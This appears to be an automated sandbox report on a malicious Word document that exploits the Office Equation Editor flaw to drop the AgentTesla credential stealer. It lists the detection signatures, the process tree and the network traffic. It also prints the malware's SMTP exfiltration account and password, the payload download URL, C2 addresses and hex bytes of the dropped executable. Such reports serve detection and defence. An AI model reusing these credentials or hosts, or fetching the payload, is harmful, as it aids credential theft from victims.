Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Pending Orders Statement -40064778.doc

Overview

General Information

Sample Name:Pending Orders Statement -40064778.doc
Analysis ID:345163
MD5:47c45cbbc8fa7c9c62efdfcadee09e99
SHA1:e44f1f16be00551108ece175186d84ce6432a177
SHA256:1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
Tags:doc

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Installs a global keyboard hook
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • poiuytrewsdfghjklmnbvcx.exe (PID: 2572 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
      • poiuytrewsdfghjklmnbvcx.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
      • poiuytrewsdfghjklmnbvcx.exe (PID: 2712 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, NewProcessName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, OriginalFileName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ProcessId: 2572
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.111.202.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: poiuytrewsdfghjklmnbvcx.exe.2712.6.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Pending Orders Statement -40064778.docVirustotal: Detection: 41%Perma Link
              Source: Pending Orders Statement -40064778.docReversingLabs: Detection: 47%

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Uses new MSVCR DllsShow sources
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
              Source: Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: global trafficDNS query: name: cy.kl-re.com
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://xWUrFiDn0aBmFXBFM.net
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 27 Jan 2021 18:29:36 GMTContent-Type: application/x-msdownloadContent-Length: 246784Connection: keep-aliveLast-Modified: Tue, 26 Jan 2021 23:18:29 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Nginx-Upstream-Cache-Status: EXPIREDX-Server-Powered-By: EngintronAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72
              Source: global trafficHTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 193.239.147.103 193.239.147.103
              Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
              Source: Joe Sandbox ViewASN Name: BLACKNIGHT-ASIE BLACKNIGHT-ASIE
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
              Source: global trafficHTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: cy.kl-re.com
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106510969.0000000000736000.00000004.00000020.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358448912.0000000008426000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.comy
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349117316.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://duylfM.com
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS/
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: poiuytrewsdfghjklmnbvcx.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
